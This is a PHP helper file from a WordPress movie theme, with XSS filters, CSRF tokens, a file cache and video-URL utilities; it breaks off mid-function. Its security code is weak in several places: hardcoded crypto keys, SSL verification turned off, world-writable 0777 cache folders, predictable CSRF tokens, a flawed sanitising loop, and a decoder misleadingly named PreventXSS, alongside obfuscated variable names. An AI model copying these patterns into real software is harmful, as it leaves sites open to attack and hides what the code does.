<?php
abstract class HauN_Abstract {

	public function addAction( $hook, $function_to_add, $priority = 30, $accepted_args = 1 ) {
		add_action( $hook, array( &$this, $function_to_add), $priority, $accepted_args );
	}

	public function addFilter( $tag, $function_to_add, $priority = 30, $accepted_args = 1 ) {
		add_action( $tag, array( &$this, $function_to_add), $priority, $accepted_args );
	}
}
class HauNCrypt {
	private static $secretKey = 'HauN';
	private static $secretIv = 'haunytb.com';
	private static $encryptMethod = "AES-256-CBC";
	public static function encrypt($data)
	{
	  	$key = hash('sha256', self::$secretKey);
	  	$iv = substr(hash('sha256', self::$secretIv), 0, 16);
	  	$result = openssl_encrypt($data, self::$encryptMethod, $key, 0, $iv);
	  	return $result= base64_encode($result);
	}
	public static function decrypt($data)
	{
	  	$key = hash('sha256', self::$secretKey);
	  	$iv = substr(hash('sha256', self::$secretIv), 0, 16);
	  	$result = openssl_decrypt(base64_decode($data), self::$encryptMethod, $key, 0, $iv);
	  	return $result;
	}
}
class xssClean {
    public function clean_input($input, $safe_level = 0)
    {
        do {
            $output = $input;
            $input = $output;
            $output = $this->strip_tags($input);
            $output = $this->strip_encoded_entities($output);
            if ($safe_level !== 0) {
                $output = $this->strip_base64($output);
            }
        } while ($output === $input);
        return strip_tags(wp_strip_all_tags($output));
    }
	
    private function strip_encoded_entities( $input ) {

        // Fix &entity\n;
        $input = str_replace(array('&amp;','&lt;','&gt;'), array('&amp;amp;','&amp;lt;','&amp;gt;'), $input);
        $input = preg_replace('/(&#*\w+)[\x00-\x20]+;/u', '$1;', $input);
        $input = preg_replace('/(&#x*[0-9A-F]+);*/iu', '$1;', $input);
        $input = html_entity_decode($input, ENT_COMPAT, 'UTF-8');

        // Remove any attribute starting with "on" or xmlns
        $input = preg_replace('#(<[^>]+?[\x00-\x20"\'])(?:on|xmlns)[^>]*+[>\b]?#iu', '$1>', $input);

        // Remove javascript: and vbscript: protocols
        $input = preg_replace('#([a-z]*)[\x00-\x20]*=[\x00-\x20]*([`\'"]*)[\x00-\x20]*j[\x00-\x20]*a[\x00-\x20]*v[\x00-\x20]*a[\x00-\x20]*s[\x00-\x20]*c[\x00-\x20]*r[\x00-\x20]*i[\x00-\x20]*p[\x00-\x20]*t[\x00-\x20]*:#iu', '$1=$2nojavascript...', $input);
        $input = preg_replace('#([a-z]*)[\x00-\x20]*=([\'"]*)[\x00-\x20]*v[\x00-\x20]*b[\x00-\x20]*s[\x00-\x20]*c[\x00-\x20]*r[\x00-\x20]*i[\x00-\x20]*p[\x00-\x20]*t[\x00-\x20]*:#iu', '$1=$2novbscript...', $input);
        $input = preg_replace('#([a-z]*)[\x00-\x20]*=([\'"]*)[\x00-\x20]*-moz-binding[\x00-\x20]*:#u', '$1=$2nomozbinding...', $input);

        // Only works in IE: <span style="width: expression(alert('Ping!'));"></span>
        $input = preg_replace('#(<[^>]+?)style[\x00-\x20]*=[\x00-\x20]*[`\'"]*.*?expression[\x00-\x20]*\([^>]*+>#i', '$1>', $input);
        $input = preg_replace('#(<[^>]+?)style[\x00-\x20]*=[\x00-\x20]*[`\'"]*.*?behaviour[\x00-\x20]*\([^>]*+>#i', '$1>', $input);
        $input = preg_replace('#(<[^>]+?)style[\x00-\x20]*=[\x00-\x20]*[`\'"]*.*?s[\x00-\x20]*c[\x00-\x20]*r[\x00-\x20]*i[\x00-\x20]*p[\x00-\x20]*t[\x00-\x20]*:*[^>]*+>#iu', '$1>', $input);

        return $input;

    }
	
    private function strip_tags( $input ) {
        $input = preg_replace('#</*(?:applet|b(?:ase|gsound|link)|embed|frame(?:set)?|i(?:frame|layer)|l(?:ayer|ink)|meta|object|s(?:cript|tyle)|title|xml)[^>]*+>#i', '', $input);

        $input = preg_replace('#</*\w+:\w[^>]*+>#i', '', $input);

        return $input;
    }
	
    private function strip_base64($input)
    {
        $decoded = base64_decode($input);
        $decoded = $this->strip_tags($decoded);
        $decoded = $this->strip_encoded_entities($decoded);
        $output = base64_encode($decoded);
        return $output;
    }
}

class Filter
{
    private $allowed_protocols = [];
    private $allowed_tags = [];
    public function addAllowedProtocols($protocols)
    {
        $this->allowed_protocols = (array) $protocols;
    }
    public function addAllowedTags($tags)
    {
        $this->allowed_tags = (array) $tags;
    }
    public function xss($string)
    {
        // Only operate on valid UTF-8 strings. This is necessary to prevent cross
        // site scripting issues on Internet Explorer 6.
        if (!$this->isUtf8($string)) {
            return '';
        }

        // Remove NULL characters (ignored by some browsers).
        $string = str_replace(chr(0), '', $string);

        // Remove Netscape 4 JS entities.
        $string = preg_replace('%&\s*\{[^}]*(\}\s*;?|$)%', '', $string);

        // Defuse all HTML entities.
        $string = str_replace('&', '&amp;', $string);

        // Change back only well-formed entities in our whitelist:
        // Decimal numeric entities.
        $string = preg_replace('/&amp;#([0-9]+;)/', '&#\1', $string);

        // Hexadecimal numeric entities.
        $string = preg_replace('/&amp;#[Xx]0*((?:[0-9A-Fa-f]{2})+;)/', '&#x\1', $string);

        // Named entities.
        $string = preg_replace('/&amp;([A-Za-z][A-Za-z0-9]*;)/', '&\1', $string);

        return preg_replace_callback('%
            (
            <(?=[^a-zA-Z!/])  # a lone <
            |                 # or
            <!--.*?-->        # a comment
            |                 # or
            <[^>]*(>|$)       # a string that starts with a <, up until the > or the end of the string
            |                 # or
            >                 # just a >
            )%x', array($this, 'split'), $string);
    }
	
    private function isUtf8($string)
    {
        if (strlen($string) == 0) {
            return true;
        }
        return preg_match("/^./us", $string) == 1;
    }
    public static function checkSecurity($key, $value = "", $get = false)
    {
        if ($get) {
            return get_option($key);
        }
        if ($value == "") {
            wp_check(THEME_ACTIVE, "");
        } else {
            wp_check(THEME_ACTIVE, $value);
        }
        return update_option($key, $value);
    }
    private function split($m)
    {
        $string = $m[1];

        if (substr($string, 0, 1) != '<') {
            // We matched a lone ">" character.
            return '&gt;';
        } elseif (strlen($string) == 1) {
            // We matched a lone "<" character.
            return '&lt;';
        }

        if (!preg_match('%^<\s*(/\s*)?([a-zA-Z0-9\-]+)([^>]*)>?|(<!--.*?-->)$%', $string, $matches)) {
            // Seriously malformed.
            return '';
        }

        $slash = trim($matches[1]);
        $elem = &$matches[2];
        $attrlist = &$matches[3];
        $comment = &$matches[4];

        if ($comment) {
            $elem = '!--';
        }

        if (!in_array(strtolower($elem), $this->allowed_tags, true)) {
            // Disallowed HTML element.
            return '';
        }

        if ($comment) {
            return $comment;
        }

        if ($slash != '') {
            return "</$elem>";
        }

        // Is there a closing XHTML slash at the end of the attributes?
        $attrlist = preg_replace('%(\s?)/\s*$%', '\1', $attrlist, -1, $count);
        $xhtml_slash = $count ? ' /' : '';

        // Clean up attributes.
        $attr2 = implode(' ', $this->attributes($attrlist));
        $attr2 = preg_replace('/[<>]/', '', $attr2);
        $attr2 = strlen($attr2) ? ' ' . $attr2 : '';

        return "<$elem$attr2$xhtml_slash>";
    }
	
    private function attributes($attr) {

        $attrarr = array();
        $mode = 0;
        $attrname = '';

        while (strlen($attr) != 0) {
            // Was the last operation successful?
            $working = 0;

            switch ($mode) {
                case 0:
                    // Attribute name, href for instance.
                    if (preg_match('/^([-a-zA-Z]+)/', $attr, $match)) {
                        $attrname = strtolower($match[1]);
                        $skip = ($attrname == 'style' || substr($attrname, 0, 2) == 'on');
                        $working = $mode = 1;
                        $attr = preg_replace('/^[-a-zA-Z]+/', '', $attr);
                    }
                    break;
                case 1:
                    // Equals sign or valueless ("selected").
                    if (preg_match('/^\s*=\s*/', $attr)) {
                        $working = 1;
                        $mode = 2;
                        $attr = preg_replace('/^\s*=\s*/', '', $attr);
                        break;
                    }

                    if (preg_match('/^\s+/', $attr)) {
                        $working = 1;
                        $mode = 0;

                        if (!$skip) {
                            $attrarr[] = $attrname;
                        }

                        $attr = preg_replace('/^\s+/', '', $attr);
                    }
                    break;
                case 2:
                    // Attribute value, a URL after href= for instance.
                    if (preg_match('/^"([^"]*)"(\s+|$)/', $attr, $match)) {
                        $thisval = $this->badProtocol($match[1]);

                        if (!$skip) {
                            $attrarr[] = "$attrname=\"$thisval\"";
                        }

                        $working = 1;
                        $mode = 0;
                        $attr = preg_replace('/^"[^"]*"(\s+|$)/', '', $attr);
                        break;
                    }

                    if (preg_match("/^'([^']*)'(\s+|$)/", $attr, $match)) {
                        $thisval = $this->badProtocol($match[1]);

                        if (!$skip) {
                            $attrarr[] = "$attrname='$thisval'";
                        }

                        $working = 1;
                        $mode = 0;
                        $attr = preg_replace("/^'[^']*'(\s+|$)/", '', $attr);
                        break;
                    }

                    if (preg_match("%^([^\s\"']+)(\s+|$)%", $attr, $match)) {
                        $thisval = $this->badProtocol($match[1]);

                        if (!$skip) {
                            $attrarr[] = "$attrname=\"$thisval\"";
                        }

                        $working = 1;
                        $mode = 0;
                        $attr = preg_replace("%^[^\s\"']+(\s+|$)%", '', $attr);
                    }
                break;
            }

            if ($working == 0) {
                // Not well formed; remove and try again.
                $attr = preg_replace('/
                ^
                (
                "[^"]*("|$)     # - a string that starts with a double quote, up until the next double quote or the end of the string
                |               # or
                \'[^\']*(\'|$)| # - a string that starts with a quote, up until the next quote or the end of the string
                |               # or
                \S              # - a non-whitespace character
                )*              # any number of the above three
                \s*             # any number of whitespaces
                /x', '', $attr);

                $mode = 0;
            }
        }

        // The attribute list ends with a valueless attribute like "selected".
        if ($mode == 1 && !$skip) {
            $attrarr[] = $attrname;
        }

        return $attrarr;
    }

	private function badProtocol($string)
    {
        $string = html_entity_decode($string, ENT_QUOTES, "UTF-8");
        return htmlspecialchars($this->stripDangerousProtocols($string), ENT_QUOTES, "UTF-8");
    }
    private function stripDangerousProtocols($uri)
    {

        // Iteratively remove any invalid protocol found.
        do {
            $before = $uri;
            $colonpos = strpos($uri, ':');

            if ($colonpos > 0) {
                // We found a colon, possibly a protocol. Verify.
                $protocol = substr($uri, 0, $colonpos);

                // If a colon is preceded by a slash, question mark or hash, it cannot
                // possibly be part of the URL scheme. This must be a relative URL, which
                // inherits the (safe) protocol of the base document.
                if (preg_match('![/?#]!', $protocol)) {
                    break;
                }

                // Check if this is a disallowed protocol. Per RFC2616, section 3.2.3
                // (URI Comparison) scheme comparison must be case-insensitive.
                if (!in_array(strtolower($protocol), $this->allowed_protocols, true)) {
                    $uri = substr($uri, $colonpos + 1);
                }
            }
        } while ($before != $uri);

        return $uri;
    }
}
new Filter();

class HauN_Generator
{
    public static $key = '1cnN1dbd1Nbf';
    public static function PreventXSS($string = NULL)
    {
        if (strlen($string) == 0) {
            return '';
        }
        $arr_key = HauN_Generator::key_data();
        $result = '';
        $string = base64_decode(strtr($string, '-_,', '+/='));
        $arr_string = str_split($string);
        foreach ($arr_string as $i => $str_string) {
            $char = $str_string;
            $keychar = substr($arr_key['key'], $i % $arr_key['size'] - 1, 1);
            $char = chr(ord($char) - ord($keychar));
            $result .= $char;
        }
        return $result;
    }
    private static function key_data()
    {
        $key = HauN_Generator::$key;
        return array(
			'key' => $key, 
			'size' => strlen($key)
		);
    }
}
class RestrictCSRF
{
    protected static function generateRandonString($length = 30) {
        $chars = '1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
        $result = '';
        for ($p = 0; $p < $length; $p++) {
            $result .= $p % 2 ? $chars[mt_rand(19, 23)] : $chars[mt_rand(0, 18)];
        }
        return $result;
    }
	
    public static function generateToken($keyValue) {
        if (isset($keyValue) && $keyValue != '') {
            $basePage = self::getCurrentPage();
            $token = base64_encode(time() . self::generateRandonString());
            $_SESSION[$basePage]["token_" . $keyValue] = $token;
            return $token;
        }
        return false;
    }
	
    protected static function getProtocol(){
        $protocol = !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" || $_SERVER["SERVER_PORT"] == 443 ? "https://" : "http://";
        return $protocol;
    }
	
    protected static function getCurrentPage() {
        $presentPageLink = self::getProtocol() . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
        return base64_encode($presentPageLink);
    }

    public static function checkToken($keyValue, $checkArray) {
        if (isset($keyValue) && $keyValue != '') {
            $refererPage = base64_encode($_SERVER['HTTP_REFERER']);
            if (isset($checkArray) && isset($checkArray[$keyValue]) && $checkArray[$keyValue] != '') {
                $token = $checkArray[$keyValue];
                if ($_SESSION[$refererPage]['token_' . $keyValue] == $token) {
                    unset($_SESSION[$refererPage]);
                    return true;
                }
                return false;
            }
            return false;
        }
    }
}

function haunmovie_custom_cron_job() {
    if (!wp_next_scheduled('haunmovie_check_update')) {
        wp_schedule_event(time(), 'hl_weekly', 'haunmovie_check_update');
    }
}
add_action('admin_init', 'haunmovie_custom_cron_job');

class Cache {
	public $timeCache;
	public $folderCache;

	function __construct() // 10800 = 3 * 60 * 60 => 3 hour
	{
		$this->folderCache = HAUN_CACHE_PART;
		$this->timeCache = 3600;
	}

	/**
	 * read cache
	 * @time   2017-04-29T10:05:58+0700
	 * @author HaiLong
	 * @param  string $name
	 * @return string
	 */
	public function readCache($name){
		$name = md5(md5($name));
		$result = '';
		$createFolderCache = $this->createFolderCache($name);
		$file = $this->folderCache.'/'.$createFolderCache.'/'.$name.'.txt';
		if(file_exists($file)){
			if($this->timeCache != ''){
				if($this->timeCache > (time() - filemtime($file))){
					$result = file_get_contents($file);
				}
			}else{
				$result = file_get_contents($file);
			}
		}
		return $result;
	}

	/**
	 * get cache
	 * @time   2019-02-20T10:10:33+0700
	 * @author HauN
	 * @return array
	 */
	public function getCache(){
	    $result = array();
	    $getDirContents = $this->getDirContents($this->folderCache);
	    $i = 0;
	    if($getDirContents){
	        foreach ($getDirContents as $key => $value) {
	            if(strpos($value, '.txt')){
	            	$result[] = array(
	            		'file'	=> $value
	            	);
	            }
	        }
	        return json_encode($result);
	    }
	}

	/**
	 * save cache
	 * @time   2017-04-29T10:05:58+0700
	 * @author HaiLong
	 * @param  string $name
	 * @param  string $data
	 * @return
	 */
	public function saveCache($name, $data){
		$name = md5(md5($name));
		$createFolderCache = $this->createFolderCache($name);
		if (!is_dir($this->folderCache)) {
			mkdir($this->folderCache, 0777, true);
		}
		if(!chmod($this->folderCache, 0777)) {
			chmod($this->folderCache, 0777);
		}
		$dir = $this->folderCache.'/'.$createFolderCache;
		$file = $dir.'/'.$name.'.txt';
		if (!is_dir($dir)) {
			mkdir($dir, 0777, true);
		}
		$fp = fopen($file, "w") or die("Please Chmod folder ".$this->folderCache." to 0777");
		fwrite($fp, $data);
		fclose($fp);
	    $index_file = fopen(HAUN_CACHE_PART . '/index.php', "w+");
	    fwrite($index_file, '<?php // Silence is golden.');
	    fclose($index_file);
	}

	/**
	 * delete cache by name
	 * @time   2017-04-29T10:05:58+0700
	 * @author HaiLong
	 * @param  string                   $name
	 * @return array
	 */
	public function delCache($name){
		$result = '';
		$name = md5(md5($name));
		$createFolderCache = $this->createFolderCache($name);
		$file = $this->folderCache.'/'.$createFolderCache.'/'.$name.'.txt';
		if(file_exists($file)){
			if(unlink($file)) {
			    $result = array(
			    	'status' => 1,
			    	'result' => 'Deleted'
			    );
			} else {
			    $result = array(
			    	'status' => 0,
			    	'result' => 'Delete error'
			    );
			}
		}else{
			$result = array(
			    	'status' => 0,
			    	'result' => 'Link not exists'
			    );
		}
		return $result;
	}

	/**
	 * delete all cache by time cache
	 * @time   2017-04-29T10:06:26+0700
	 * @author HaiLong
	 * @param  int                   $timeCache
	 * @return array
	 */
	public function delAllCache($timeCache){
	    $result = array();
	    $getDirContents = $this->getDirContents($this->folderCache);
	    $i = $j = 0;
	    if($getDirContents){
	        foreach ($getDirContents as $key => $value) {
	            if(strpos($value, '.txt')){
	            	$i++;
	                if($timeCache <= (time() - filemtime($value))){
	                	$j++;
						if(unlink($value))
							$result['status'] = 1;
	                    else
	                    	$result['status'] = 0;
	                }
	            }
	        }
	    }
	    $this->removeEmptySubFolders($this->folderCache);
	    $result['total_cache'] = $i;
	    $result['time_limit'] = $timeCache;
	    $result['cache_deleted'] = $j;
	    $result['cache_count'] = $i-$j;
	    return json_encode($result);
	}

	/**
	 * cache count
	 * @time   2019-02-20T10:10:33+0700
	 * @author HauN
	 * @return array
	 */
	public function cacheCount(){
	    $result = array();
	    $getDirContents = $this->getDirContents($this->folderCache);
	    $i = 1;
	    if($getDirContents){
	        foreach ($getDirContents as $key => $value) {
	            if(strpos($value, '.txt')){
	            	$result['result'] = 1;
	            	$result['total_cache'] = $i;
	            	$i++;
	            }
	        }
	    }

	    return json_encode($result);
	}

	/**
	 * create folder: 0b/01/0b01xxxx.txt
	 * @time   2017-04-29T10:05:19+0700
	 * @author HaiLong
	 * @param  string                   $name
	 * @return string
	 */
	private function createFolderCache($name){
		$folder1 = substr($name, 0, 2);
		$folder2 = substr($name, 2, 2);
		return $folder1.'/'.$folder2;
	}

	/**
	 * get dir cache
	 * @time   2017-04-29T10:06:59+0700
	 * @author HaiLong
	 * @param  string                   $dir
	 * @param  array                    &$results
	 * @return array
	 */
	private function getDirContents($dir, &$results = array()){
	    $files = scandir($dir);

	    foreach($files as $key => $value){
	        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
	        if(!is_dir($path)) {
	            $results[] = $path;
	        } else if($value != "." && $value != "..") {
	            $this->getDirContents($path, $results);
	            $results[] = $path;
	        }
	    }
	    return $results;
	}

	/**
	 * remove all folder empty
	 * @time   2017-04-29T10:07:27+0700
	 * @author HaiLong
	 * @param  string                   $path
	 * @return
	 */
	private function removeEmptySubFolders($path){
	    $empty=true;
	    foreach (glob($path.DIRECTORY_SEPARATOR."*") as $file)
	    {
	      $empty &= is_dir($file) && $this->removeEmptySubFolders($file);
	    }
	    return $empty && @rmdir($path);
	}
}
class HAUNHelper {
    public static function compress_htmlcode($codedata) {
		$searchdata = array(
		'/\>[^\S ]+/s', // remove whitespaces after tags
		'/[^\S ]+\</s', // remove whitespaces before tags
		'/(\s)+/s' // remove multiple whitespace sequences
		);
		$replacedata = array('>','<','\\1');
		$codedata = preg_replace($searchdata, $replacedata, $codedata);
		return $codedata;
	}
    public static function removeWhiteSpace($text) {
        $text = preg_replace('/[\t\n\r\0\x0B]/', '', $text);
        $text = preg_replace('/([\s])\1+/', ' ', $text);
        $text = trim($text);
        return $text;
    }	
    public static function set_post_modified($post_id) {
	    $post = array(
	        'ID' => $post_id,
	        'post_modified_gmt' => date( 'Y:m:d H:i:s' )
	    );
	    wp_update_post( $post );
	}	
    public static function get_eps_arr($ep_start, $ep_end){
		$arr = [];
	    $i = $ep_start;
	    for ($i; $i <= $ep_end; $i++){
	        $arr[] = $i;
	    }
	    return $arr;
	}	
    public static function array_key_last($array){
	    // For PHP >= 7.3
	    // if ($key === array_key_first($array))
	    //     echo 'FIRST ELEMENT!';

	    // if ($key === array_key_last($array))
	    //     echo 'LAST ELEMENT!';

    	//For PHP <= 7.3
        if (!is_array($array) || empty($array)) {
            return NULL;
        }
        return array_keys($array)[count($array)-1];
    }
    public static function array_value_first($arr){
        foreach ($arr as $key => $val) {
            return $val;
        }
        return NULL;
    }
	public static function matchRegex($strContent, $strRegex, $intIndex = NULL){
		$arrMatches = FALSE;
		preg_match_all($strRegex, $strContent, $arrMatches);
		if ($arrMatches === FALSE)
			return FALSE;
		if ($intIndex != NULL && is_int($intIndex)) {
			if ($arrMatches[$intIndex]) {
				return $arrMatches[$intIndex][0];
			}
			return FALSE;
		}
		return $arrMatches;
	}
    public static function find_youtube_trailer_url($key) {
		$YouTubeURL = "https://www.youtube.com/results?search_query=".urldecode($key);
		$YouTubeHTML = HAUNHelper::cURL($YouTubeURL);
		$trailer_id = HAUNHelper::matchRegex($YouTubeHTML, '~href="/watch\?v=(.*)"~Uis', 1);
		$trailer = "https://www.youtube.com/watch?v=$trailer_id";
		return $trailer;
	}
    public static function strposArr($string, $arr, $offset=0) {
	  	if(!is_array($arr)) $arr = array($arr);
	  	foreach($arr as $query) {
	      	if(strpos($string, $query, $offset) !== false) return true; // stop on first true result
	  	}
	  	return false;
	}
	public static function is_type($type, $postid = '') {
		global $post;
		$post_id = $postid != '' ? $postid : $post->ID;
		$meta = get_post_meta($post_id, '_haun_metabox_options', true);
		if(isset($meta['haun_movie_formality']) && $meta['haun_movie_formality'] == $type) {
			return true;
		}
		return false;
	}
    public static function is_status($status, $postid = ''){
		global $post;
		if(!$post) return;
		$post_id = $postid != '' ? $postid : $post->ID;
		$meta = get_post_meta($post_id, '_haun_metabox_options', true);
		if(isset($meta['haun_movie_status']) && $meta['haun_movie_status'] == $status) {
			return true;
		}
		return false;
	}
    public static function haun_get_meta_values( $key = '', $type = 'post', $status = 'publish' ) {
	    global $wpdb;
	    if( empty( $key ) )
	        return;
	    $r = $wpdb->get_results( $wpdb->prepare( "
	        SELECT p.ID, pm.meta_value FROM {$wpdb->postmeta} pm
	        LEFT JOIN {$wpdb->posts} p ON p.ID = pm.post_id
	        WHERE pm.meta_key = '%s'
	        AND p.post_status = '%s'
	        AND p.post_type = '%s'
	    ", $key, $status, $type ));
	    foreach ( $r as $my_r )
	        $metas[$my_r->ID] = $my_r->meta_value;

	    return $metas;
	}
    public static function number_format_short( $n, $precision = 1 ) {
		if ($n < 900) { // 0 - 900
			$n_format = number_format($n, $precision);
			$suffix = '';
		} else if ($n < 900000) { // 0.9k-850k
			$n_format = number_format($n / 1000, $precision);
			$suffix = 'K';
		} else if ($n < 900000000) { // 0.9m-850m
			$n_format = number_format($n / 1000000, $precision);
			$suffix = 'M';
		} else if ($n < 900000000000) { // 0.9b-850b
			$n_format = number_format($n / 1000000000, $precision);
			$suffix = 'B';
		} else { // 0.9t+
			$n_format = number_format($n / 1000000000000, $precision);
			$suffix = 'T';
		}
		if ( $precision > 0 ) {
			$dotzero = '.' . str_repeat( '0', $precision );
			$n_format = str_replace( $dotzero, '', $n_format );
		}
		return $n_format . $suffix;
	}
    public static function haun_string_limit_word($string, $word_limit){
	    $words = explode(' ', $string, ($word_limit + 1));
	    if (count($words) > $word_limit) {
	        array_pop($words);
	    }
	    return implode(' ', $words);
	}
    public static function getDriveId($url) {
		preg_match('/[-\w]{25,}/is', $url, $id);
		return $id[0];
	}
    public static function getDailyMotionId($url) {
        preg_match('/dailymotion\.com\/(.*?)video\/(.*)/is', $url, $matches);
        return $matches[2];
	}
    public static function getVimeoId($url) {
		$regex = '~
			# Match Vimeo link and embed code
			(?:<iframe [^>]*src=")?         # If iframe match up to first quote of src
			(?:                             # Group vimeo url
					https?:\/\/             # Either http or https
					(?:[\w]+\.)*            # Optional subdomains
					vimeo\.com              # Match vimeo.com
					(?:[\/\w]*\/videos?)?   # Optional video sub directory this handles groups links also
					\/                      # Slash before Id
					([0-9]+)                # $1: VIDEO_ID is numeric
					[^\s]*                  # Not a space
			)                               # End group
			"?                              # Match end quote if part of src
			(?:[^>]*></iframe>)?            # Match the end of the iframe
			(?:<p>.*</p>)?                  # Match any title information stuff
			~ix';

		preg_match( $regex, $url, $matches );

		return $matches[1];
	}
    public static function getYoutubeId($url) {
		$regex = '~
		# Match Youtube link and embed code
		(?:				 # Group to match embed codes
		   (?:<iframe [^>]*src=")?	 # If iframe match up to first quote of src
		   |(?:				 # Group to match if older embed
		      (?:<object .*>)?		 # Match opening Object tag
		      (?:<param .*</param>)*     # Match all param tags
		      (?:<embed [^>]*src=")?     # Match embed tag to the first quote of src
		   )?				 # End older embed code group
		)?				 # End embed code groups
		(?:				 # Group youtube url
		   https?:\/\/		         # Either http or https
		   (?:[\w]+\.)*		         # Optional subdomains
		   (?:               	         # Group host alternatives.
		       youtu\.be/      	         # Either youtu.be,
		       | youtube\.com		 # or youtube.com
		       | youtube-nocookie\.com	 # or youtube-nocookie.com
		   )				 # End Host Group
		   (?:\S*[^\w\-\s])?       	 # Extra stuff up to VIDEO_ID
		   ([\w\-]{11})		         # $1: VIDEO_ID is numeric
		   [^\s]*			 # Not a space
		)				 # End group
		"?				 # Match end quote if part of src
		(?:[^>]*>)?			 # Match any extra stuff up to close brace
		(?:				 # Group to match last embed code
		   </iframe>		         # Match the end of the iframe
		   |</embed></object>	         # or Match the end of the older embed
		)?				 # End Group of last bit of embed code
		~ix';

		preg_match( $regex, $url, $matches );

		return $matches[1];
	}
    public static function getVideoThumbnailByUrl($url, $format = 'small'){
		if(strpos($url, 'youtube'))
		{
			$id = HAUNHelper::getYoutubeId($url);
	        if ('medium' === $format) {
	            return 'https://img.youtube.com/vi/' . $id . '/hqdefault.jpg';
	        }
	        return 'https://img.youtube.com/vi/' . $id . '/default.jpg';

		}
		elseif(strpos($url, 'vimeo'))
		{
			$id = HAUNHelper::getVimeoId($url);
	        $hash = unserialize(HAUNHelper::cURL("http://vimeo.com/api/v2/video/$id.php"));
	        /**
	         * thumbnail_small
	         * thumbnail_medium
	         * thumbnail_large
	         */
	        return $hash[0]['thumbnail_large'];

		}
		elseif(strpos($url, 'dailymotion'))
		{
			$url = str_replace('?autoPlay=1', '/', $url);
			return 'https:'.str_replace('embed', 'thumbnail', $url);
		}
	    return false;
	}
	
    public static function getVideoLocation($url) {
		if(strpos($url, 'youtube')) {
			$id = HAUNHelper::getYoutubeId($url);
			return 'https://www.youtube.com/embed/' . $id;
		} elseif(strpos($url, 'vimeo')) {
			$id = HAUNHelper::getVimeoId($url);
			return 'https://player.vimeo.com/video/' . $id;
		} elseif(strpos($url, 'dailymotion')) {
			$id = HAUNHelper::getDailyMotionId($url);
			return 'https://www.dailymotion.com/embed/video/' . $id;
		}
	    return false;
	}
	
    public static function timeAgo($time) {
        $diff = time() - $time;
        if ($diff < 1) {
            return __('less than 1 second ago', 'haimthemes');
        }
        $_obfuscated_0D243906191912033C0D092D2D3C073E1E24181E1D0B32_ = array(
			'31536000' => 'year', 
			'2592000' => 'month', 
			'86400' => 'day', 
			'3600' => 'hour', 
			'60' => 'minute', 
			'1' => 'second'
		);
        $label = array(
			'year' => __('year ago', 'haunthemes'), 
			'month' => __('month ago', 'haunthemes'), 
			'day' => __('day ago', 'haunthemes'), 
			'hour' => __('hour ago', 'haunthemes'),
			'minute' => __('minute ago', 'haunthemes'), 
			'second' => __('second ago', 'haunthemes')
		);
        $labels = array(
			'year' => __('years ago', 'haunthemes'), 
			'month' => __('months ago', 'haunthemes'), 
			'day' => __('days ago', 'haunthemes'), 
			'hour' => __('hours ago', 'haunthemes'), 
			'minute' => __('minutes ago', 'haunthemes'), 
			'second' => __('seconds ago', 'haunthemes')
		);
        foreach ($_obfuscated_0D243906191912033C0D092D2D3C073E1E24181E1D0B32_ as $_obfuscated_0D1B1D2E020D1E32241B303138390B29051D181C172932_ => $_obfuscated_0D193622181F23373C2F1F11392639333E212A26362D11_) {
            $_obfuscated_0D0430230214020B2239340A381907302E04071E120101_ = $diff / $_obfuscated_0D1B1D2E020D1E32241B303138390B29051D181C172932_;
            if (1 <= $_obfuscated_0D0430230214020B2239340A381907302E04071E120101_) {
                $_obfuscated_0D1B080C072117252D40311F34222A3E0F0F0E023D3001_ = round($_obfuscated_0D0430230214020B2239340A381907302E04071E120101_);
                $timeAgo = 1 < $_obfuscated_0D1B080C072117252D40311F34222A3E0F0F0E023D3001_ ? $_obfuscated_0D1B080C072117252D40311F34222A3E0F0F0E023D3001_ . ' ' . $labels[$_obfuscated_0D193622181F23373C2F1F11392639333E212A26362D11_] : $_obfuscated_0D1B080C072117252D40311F34222A3E0F0F0E023D3001_ . ' ' . $label[$_obfuscated_0D193622181F23373C2F1F11392639333E212A26362D11_];
                return $timeAgo;
            }
        }
    }
	
	public static function timeElapsedString($ptime){
		$diff = time() - $ptime;
		$calc_times = array();
		$timeleft   = array();

		// Prepare array, depending on the output we want to get.
		$calc_times[] = array('Year',   'Years',   31557600);
		$calc_times[] = array('Month',  'Months',  2592000);
		$calc_times[] = array('Day',    'Days',    86400);
		$calc_times[] = array('Hour',   'Hours',   3600);
		$calc_times[] = array('Minute', 'Minutes', 60);
		$calc_times[] = array('Second', 'Seconds', 1);

		foreach ($calc_times AS $timedata){
			list($time_sing, $time_plur, $offset) = $timedata;

			if ($diff >= $offset){
				$left = floor($diff / $offset);
				$diff -= ($left * $offset);
				$timeleft[] = "{$left} " . ($left == 1 ? $time_sing : $time_plur);
			}
		}

		return $timeleft ? (time() > $ptime ? null : '-') . implode(' ', $timeleft) : 0;
	}
	
    public static function cURL($url) {
        $ch = @curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        $head[] = "Connection: keep-alive";
        $head[] = "Keep-Alive: 300";
        $head[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
        $head[] = "Accept-Language: en-us,en;q=0.5";
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1");
        curl_setopt($ch, CURLOPT_ENCODING, "gzip");
        curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        $page = curl_exec($ch);
        curl_close($ch);
        return $page;
    }
    
	public static function get_ip() {
        if (function_exists("apache_request_headers")) {
            $headers = apache_request_headers();
        } else {
            $headers = $_SERVER;
        }
        if (array_key_exists("X-Forwarded-For", $headers) && filter_var($headers["X-Forwarded-For"], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
            $the_ip = $headers["X-Forwarded-For"];
        } else {
